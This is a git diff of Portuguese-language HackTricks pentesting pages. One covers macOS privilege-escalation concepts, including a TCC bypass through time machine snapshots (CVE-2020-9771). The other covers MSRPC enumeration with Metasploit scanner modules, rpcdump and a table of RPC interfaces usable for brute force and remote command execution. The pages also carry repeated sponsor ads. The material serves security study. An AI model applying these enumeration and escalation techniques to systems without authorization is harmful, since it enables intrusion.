* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me no Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

75
macos-hardening/macos-security-and-privilege-escalation/README.md
View file

@ -4,29 +4,36 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga** me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novos programas de recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
## MacOS Básico
Se você não está familiarizado com o macOS, você deve começar aprendendo os conceitos básicos do macOS:&#x20;
Se você não está familiarizado com o macOS, você deve começar aprendendo o básico do macOS:&#x20;
* Arquivos e permissões especiais do macOS:
* **Arquivos e permissões especiais** do macOS:
{% content-ref url="macos-files-folders-and-binaries/" %}
[macos-files-folders-and-binaries](macos-files-folders-and-binaries/)
@ -58,7 +65,7 @@ Se você não está familiarizado com o macOS, você deve começar aprendendo os
### MacOS MDM
Em empresas, os sistemas **macOS** são altamente prováveis de serem **gerenciados com um MDM**. Portanto, do ponto de vista de um atacante, é interessante saber **como isso funciona**:
Nas empresas, os sistemas **macOS** provavelmente serão **gerenciados com um MDM**. Portanto, do ponto de vista de um atacante, é interessante saber **como isso funciona**:
{% content-ref url="../macos-red-teaming/macos-mdm/" %}
[macos-mdm](../macos-red-teaming/macos-mdm/)
@ -80,31 +87,30 @@ Em empresas, os sistemas **macOS** são altamente prováveis de serem **gerencia
### Permissões de Arquivo
Se um **processo em execução como root escreve** um arquivo que pode ser controlado por um usuário, o usuário pode abusar disso para **escalar privilégios**.\
Se um **processo em execução como root escrever** um arquivo que pode ser controlado por um usuário, o usuário pode abusar disso para **elevar privilégios**.\
Isso pode ocorrer nas seguintes situações:
* O arquivo usado já foi criado por um usuário (propriedade do usuário)
* O arquivo usado já foi criado por um usuário (pertence ao usuário)
* O arquivo usado é gravável pelo usuário por causa de um grupo
* O arquivo usado está dentro de um diretório de propriedade do usuário (o usuário pode criar o arquivo)
* O arquivo usado está dentro de um diretório de propriedade do root, mas o usuário tem acesso de gravação sobre ele por causa de um grupo (o usuário pode criar o arquivo)
Ser capaz de **criar um arquivo** que será **usado pelo root**, permite que um usuário **aproveite seu conteúdo** ou até mesmo crie **symlinks/hardlinks** para apontá-lo para outro lugar.
Para esse tipo de vulnerabilidade, não se esqueça de **verificar os instaladores `.pkg` vulneráveis**:
Para esse tipo de vulnerabilidade, não se esqueça de **verificar instaladores `.pkg` vulneráveis**:
{% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %}
[macos-installers-abuse.md](macos-files-folders-and-binaries/macos-installers-abuse.md)
{% endcontent-ref %}
### Abuso de Privilégios e Entitlements via Abuso de Processo
### Abuso de Privilégios e Entitlements por meio de abuso de processo
Se um processo pode **injetar código em outro processo com melhores privilégios ou entitlements** ou contatá-lo para realizar ações de privilégios, ele pode escalar privilégios e contornar medidas defensivas como [Sandbox](macos-security-protections/macos-sandbox/) ou [TCC](macos-security-protections/macos-tcc/).
Se um processo pode **injetar código em outro processo com privilégios ou entitlements melhores** ou entrar em contato com ele para realizar ações com privilégios, ele pode elevar privilégios e contornar medidas defensivas como [Sandbox](macos-security-protections/macos-sandbox/) ou [TCC](macos-security-protections/macos-tcc/).
{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse](macos-proces-abuse/)
{% endcontent-ref %}
### Manipuladores de aplicativos de esquema de URL e extensão de arquivo
### Manipuladores de aplicativos de extensão de arquivo e esquema de URL
Aplicativos estranhos registrados por extensões de arquivo podem ser abusados e diferentes aplicativos podem ser registrados para abrir protocolos específicos.
@ -112,12 +118,12 @@ Aplicativos estranhos registrados por extensões de arquivo podem ser abusados e
[macos-file-extension-apps.md](macos-file-extension-apps.md)
{% endcontent-ref %}
## Escalada de Privilégios do MacOS
## Escalada de privilégios no MacOS
### CVE-2020-9771 - Bypass do TCC mount\_apfs e escalada de privilégios
### CVE-2020-9771 - bypass do TCC do mount\_apfs e escalada de privilégios
**Qualquer usuário** (mesmo não privilegiado) pode criar e montar um snapshot do time machine e **acessar TODOS os arquivos** desse snapshot.\
O **único privilégio** necessário é para o aplicativo usado (como o `Terminal`) ter **Acesso Total ao Disco** (FDA) (`kTCCServiceSystemPolicyAllfiles`), que precisa ser concedido por um administrador.
**Qualquer usuário** (mesmo os não privilegiados) pode criar e montar um snapshot do time machine e **acessar TODOS os arquivos** desse snapshot.\
O **único privilégio** necessário é para o aplicativo usado (como `Terminal`) ter **Acesso Total ao Disco** (FDA) (`kTCCServiceSystemPolicyAllfiles`), que precisa ser concedido por um administrador.
{% code overflow="wrap" %}
```bash
@ -151,13 +157,13 @@ Uma explicação mais detalhada pode ser [**encontrada no relatório original**]
### Linux Privesc
Em primeiro lugar, observe que **a maioria dos truques de escalonamento de privilégios que afetam o Linux/Unix também afetarão as máquinas MacOS**. Então veja:
Antes de mais nada, observe que **a maioria dos truques de escalonamento de privilégios que afetam o Linux/Unix também afetarão as máquinas MacOS**. Portanto, veja:
{% content-ref url="../../linux-hardening/privilege-escalation/" %}
[privilege-escalation](../../linux-hardening/privilege-escalation/)
{% endcontent-ref %}
## Aplicativos Defensivos do MacOS
## Aplicativos de Defesa para MacOS
## Referências
@ -167,24 +173,31 @@ Em primeiro lugar, observe que **a maioria dos truques de escalonamento de privi
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novas recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga** me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

82
network-services-pentesting/135-pentesting-msrpc.md
View file

@ -7,45 +7,54 @@
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novos programas de recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
## Informações Básicas
Microsoft Remote Procedure Call, também conhecido como chamada de função ou chamada de sub-rotina, é [um protocolo](http://searchmicroservices.techtarget.com/definition/Remote-Procedure-Call-RPC) que usa o modelo cliente-servidor para permitir que um programa solicite serviços de um programa em outro computador sem precisar entender os detalhes da rede desse computador. O MSRPC foi originalmente derivado de software de código aberto, mas foi desenvolvido ainda mais e protegido por direitos autorais pela Microsoft.
Microsoft Remote Procedure Call, também conhecido como chamada de função ou chamada de sub-rotina, é [um protocolo](http://searchmicroservices.techtarget.com/definition/Remote-Procedure-Call-RPC) que usa o modelo cliente-servidor para permitir que um programa solicite serviço de um programa em outro computador sem precisar entender os detalhes da rede desse computador. O MSRPC foi originalmente derivado de software de código aberto, mas foi desenvolvido e protegido por direitos autorais pela Microsoft.
Dependendo da configuração do host, o mapeador de ponto de extremidade RPC pode ser acessado por meio das portas TCP e UDP 135, via SMB com uma sessão nula ou autenticada (TCP 139 e 445) e como um serviço da web ouvindo na porta TCP 593.
Dependendo da configuração do host, o mapeador de ponto de extremidade RPC pode ser acessado através das portas TCP e UDP 135, via SMB com uma sessão nula ou autenticada (TCP 139 e 445) e como um serviço da web ouvindo na porta TCP 593.
```
135/tcp open msrpc Microsoft Windows RPC
```
## Como funciona o MSRPC?
O processo MSRPC começa no lado do cliente, com a aplicação cliente chamando um procedimento stub local em vez de código que implementa o procedimento. O código stub do cliente recupera os parâmetros necessários do espaço de endereço do cliente e os entrega à biblioteca de tempo de execução do cliente, que então traduz os parâmetros em um formato padrão de representação de dados de rede para transmitir ao servidor.
O processo do MSRPC começa no lado do cliente, com a aplicação do cliente chamando um procedimento de stub local em vez de código que implementa o procedimento. O código de stub do cliente recupera os parâmetros necessários do espaço de endereço do cliente e os entrega à biblioteca de tempo de execução do cliente, que então traduz os parâmetros em um formato padrão de Representação de Dados de Rede para transmitir ao servidor.
O stub do cliente então chama funções na biblioteca de tempo de execução do cliente RPC para enviar a solicitação e os parâmetros para o servidor. Se o servidor estiver localizado remotamente, a biblioteca de tempo de execução especifica um protocolo de transporte apropriado e um mecanismo e passa o RPC para a pilha de rede para transporte para o servidor.\
O stub do cliente então chama funções na biblioteca de tempo de execução do cliente RPC para enviar a solicitação e os parâmetros para o servidor. Se o servidor estiver localizado remotamente, a biblioteca de tempo de execução especifica um protocolo de transporte apropriado e um mecanismo e passa o RPC para a pilha de rede para transporte ao servidor.\
A partir daqui: [https://www.extrahop.com/resources/protocols/msrpc/](https://www.extrahop.com/resources/protocols/msrpc/)
![](<../.gitbook/assets/image (133).png>)
**Imagem do livro "**_**Avaliação de Segurança de Rede 3ª Edição**_**"**
**Imagem do livro "**_**Network Security Assesment 3rd Edition**_**"**
## Identificando Serviços RPC Expostos
## **Identificando Serviços RPC Expostos**
Você pode consultar o serviço de localizador RPC e os pontos finais RPC individuais para catalogar serviços interessantes em execução em TCP, UDP, HTTP e SMB (por meio de pipes nomeados). Cada valor IFID coletado por meio desse processo denota um serviço RPC (por exemplo, 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc é a interface do Messenger).
**Seção extraída do livro "**_**Network Security Assesment 3rd Edition**_**"**
As ferramentas rpcdump e ifids do Windows de Todd Sabin consultam tanto o localizador RPC quanto os pontos finais RPC específicos para listar os valores IFID. A sintaxe do rpcdump é a seguinte:
Você pode consultar o serviço de localizador RPC e os pontos de extremidade RPC individuais para catalogar serviços interessantes em execução sobre TCP, UDP, HTTP e SMB (por meio de named pipes). Cada valor IFID coletado por meio desse processo denota um serviço RPC (por exemplo, 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc é a interface Messenger).
As ferramentas rpcdump e ifids do Windows de Todd Sabin consultam tanto o localizador RPC quanto os pontos de extremidade RPC específicos para listar os valores IFID. A sintaxe do rpcdump é a seguinte:
```
D:\rpctools> rpcdump [-p port] 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
@ -56,8 +65,8 @@ Binding: ncadg_ip_udp:192.168.189.1[1028]
Você pode acessar o serviço de localização RPC usando quatro sequências de protocolo:
* ncacn\_ip\_tcp e ncadg\_ip\_udp (porta TCP e UDP 135)
* ncacn\_np (o pipe \pipe\epmapper nomeado via SMB)
* ncacn\_http (RPC sobre HTTP via porta TCP 80, 593 e outras)
* ncacn\_np (o pipe \epmapper nomeado via SMB)
* ncacn\_http (RPC sobre HTTP via porta TCP 80, 593 e outros)
```bash
use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
@ -65,7 +74,7 @@ use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
rpcdump.py <IP> -p 135
```
_Nota que de todas as opções mencionadas, todas exceto **`tcp_dcerpc_auditor`** podem ser executadas **apenas** contra **msrpc** na **porta 135**._
_Nota que das opções mencionadas, todas exceto **`tcp_dcerpc_auditor`** podem ser executadas apenas contra **msrpc** na porta **135**._
#### Interfaces RPC notáveis
@ -73,18 +82,18 @@ _Nota que de todas as opções mencionadas, todas exceto **`tcp_dcerpc_auditor`*
| ------------------------------------ | -------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 12345778-1234-abcd-ef00-0123456789ab | \pipe\lsarpc | Interface LSA, usada para enumerar usuários |
| 3919286a-b10c-11d0-9ba8-00c04fd92ef5 | \pipe\lsarpc | Interface LSA Directory Services (DS), usada para enumerar domínios e relacionamentos de confiança |
| 12345778-1234-abcd-ef00-0123456789ac | \pipe\samr | Interface LSA SAMR, usada para acessar elementos públicos do banco de dados SAM (por exemplo, nomes de usuário) e forçar a senha do usuário por meio de brute-force, independentemente da política de bloqueio de conta [Biblioteca Oreilly](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#idm139659172852688) |
| 12345778-1234-abcd-ef00-0123456789ac | \pipe\samr | Interface LSA SAMR, usada para acessar elementos públicos do banco de dados SAM (por exemplo, nomes de usuários) e forçar a senha de usuários por força bruta, independentemente da política de bloqueio de contas [Biblioteca Oreilly](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#idm139659172852688) |
| 1ff70682-0a51-30e8-076d-740be8cee98b | \pipe\atsvc | Agendador de tarefas, usado para executar comandos remotamente |
| 338cd001-2244-31f1-aaaa-900038001003 | \pipe\winreg | Serviço de registro remoto, usado para acessar o registro do sistema |
| 367abb81-9844-35f1-ad32-98f038001003 | \pipe\svcctl | Gerenciador de serviços e serviços do servidor, usado para iniciar e parar serviços remotamente e executar comandos |
| 4b324fc8-1670-01d3-1278-5a47bf6ee188 | \pipe\srvsvc | Gerenciador de serviços e serviços do servidor, usado para iniciar e parar serviços remotamente e executar comandos |
| 367abb81-9844-35f1-ad32-98f038001003 | \pipe\svcctl | Gerenciador de controle de serviço e serviços do servidor, usado para iniciar e parar serviços remotamente e executar comandos |
| 4b324fc8-1670-01d3-1278-5a47bf6ee188 | \pipe\srvsvc | Gerenciador de controle de serviço e serviços do servidor, usado para iniciar e parar serviços remotamente e executar comandos |
| 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 | \pipe\epmapper | Interface DCOM, suportando WMI |
### Identificando endereços IP
Usando [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), que vem da pesquisa da [Airbus](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/), é possível abusar do método _**ServerAlive2**_ dentro da interface _**IOXIDResolver**_.
Usando [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), proveniente da pesquisa da [Airbus](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/), é possível abusar do método _**ServerAlive2**_ dentro da interface _**IOXIDResolver**_.
Esse método foi usado para obter informações de interface como endereço **IPv6** do box HTB _APT_. Veja [aqui](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) o relato do 0xdf APT, que inclui um método alternativo usando rpcmap.py do [Impacket](https://github.com/SecureAuthCorp/impacket/) com _stringbinding_ (veja acima).
Esse método tem sido usado para obter informações de interface como endereço **IPv6** do HTB box _APT_. Veja [aqui](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) o writeup do APT 0xdf, que inclui um método alternativo usando rpcmap.py do [Impacket](https://github.com/SecureAuthCorp/impacket/) com _stringbinding_ (veja acima).
Referências:
@ -93,28 +102,35 @@ Referências:
## Porta 593
O **rpcdump.exe** do [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) pode interagir com esta porta.
O **rpcdump.exe** do [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) pode interagir com essa porta.
<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novos programas de recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga** me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>